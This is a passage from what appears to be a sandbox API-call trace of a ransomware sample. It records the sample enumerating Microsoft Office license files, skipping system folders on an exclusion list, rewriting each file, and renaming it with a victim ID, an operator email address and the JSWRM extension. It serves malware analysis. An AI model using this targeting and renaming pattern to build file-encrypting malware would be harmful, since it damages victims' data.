dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.107] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe97c7b32, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe97c7b32, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe98604a1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d72, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProVL_KMS_Client-ul-oob.xrm-ms", cAlternateFileName="PREF6D~1.XRM")) returned 1 [0108.107] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.107] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.107] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.107] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.107] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.107] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.107] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.107] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.107] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.107] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0108.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0108.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0108.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0108.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0108.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0108.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0108.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0108.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0108.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0108.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0108.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_kms_client-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.108] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11634) returned 1 [0108.108] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0108.108] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0108.110] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.111] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0108.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.111] CloseHandle (hObject=0x45c) returned 1 [0108.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0108.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0108.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0108.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0108.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0108.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0108.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.111] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_kms_client-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_KMS_Client-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_kms_client-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0108.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0108.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0108.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.112] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe97a18e9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe97a18e9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe983a24f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x259a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProVL_KMS_Client-ul.xrm-ms", cAlternateFileName="PR2059~1.XRM")) returned 1 [0108.112] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul.xrm-ms", lpString2=".") returned 1 [0108.112] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul.xrm-ms", lpString2="..") returned 1 [0108.112] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul.xrm-ms", lpString2="...") returned 1 [0108.112] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul.xrm-ms", lpString2="windows") returned -1 [0108.112] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul.xrm-ms", lpString2="recovery") returned -1 [0108.112] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul.xrm-ms", lpString2="perflogs") returned 1 [0108.112] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul.xrm-ms", lpString2="documents and settings") returned 1 [0108.112] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.112] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul.xrm-ms", lpString2="system volume information") returned -1 [0108.112] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ul.xrm-ms", lpString2="msocache") returned 1 [0108.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0108.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_KMS_Client-ul.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0108.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_KMS_Client-ul.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0108.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0108.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0108.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_KMS_Client-ul.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0108.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_KMS_Client-ul.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0108.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0108.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0108.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0108.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0108.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_kms_client-ul.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.113] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9626) returned 1 [0108.114] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2590) returned 0x24c1d0 [0108.114] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2590, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2590, lpOverlapped=0x0) returned 1 [0108.116] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.116] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2590, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2590, lpOverlapped=0x0) returned 1 [0108.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.116] CloseHandle (hObject=0x45c) returned 1 [0108.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0108.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0108.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0108.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0108.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0108.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0108.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.116] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_kms_client-ul.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_KMS_Client-ul.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_kms_client-ul.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0108.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0108.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0108.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.117] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9755493, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9755493, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe97edda4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x298f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProVL_MAK-pl.xrm-ms", cAlternateFileName="PR567F~1.XRM")) returned 1 [0108.117] lstrcmpiW (lpString1="ProjectProVL_MAK-pl.xrm-ms", lpString2=".") returned 1 [0108.117] lstrcmpiW (lpString1="ProjectProVL_MAK-pl.xrm-ms", lpString2="..") returned 1 [0108.117] lstrcmpiW (lpString1="ProjectProVL_MAK-pl.xrm-ms", lpString2="...") returned 1 [0108.118] lstrcmpiW (lpString1="ProjectProVL_MAK-pl.xrm-ms", lpString2="windows") returned -1 [0108.118] lstrcmpiW (lpString1="ProjectProVL_MAK-pl.xrm-ms", lpString2="recovery") returned -1 [0108.118] lstrcmpiW (lpString1="ProjectProVL_MAK-pl.xrm-ms", lpString2="perflogs") returned 1 [0108.118] lstrcmpiW (lpString1="ProjectProVL_MAK-pl.xrm-ms", lpString2="documents and settings") returned 1 [0108.118] lstrcmpiW (lpString1="ProjectProVL_MAK-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.118] lstrcmpiW (lpString1="ProjectProVL_MAK-pl.xrm-ms", lpString2="system volume information") returned -1 [0108.118] lstrcmpiW (lpString1="ProjectProVL_MAK-pl.xrm-ms", lpString2="msocache") returned 1 [0108.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0108.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_MAK-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0108.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0108.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_MAK-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240fc0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0108.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0108.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0108.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_MAK-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0108.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0108.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_MAK-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240f48, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0108.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0108.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0108.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0108.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0108.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_mak-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.119] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10639) returned 1 [0108.119] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0108.119] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0108.121] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.121] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0108.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.121] CloseHandle (hObject=0x45c) returned 1 [0108.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0108.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0108.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0108.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0108.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0108.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0108.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 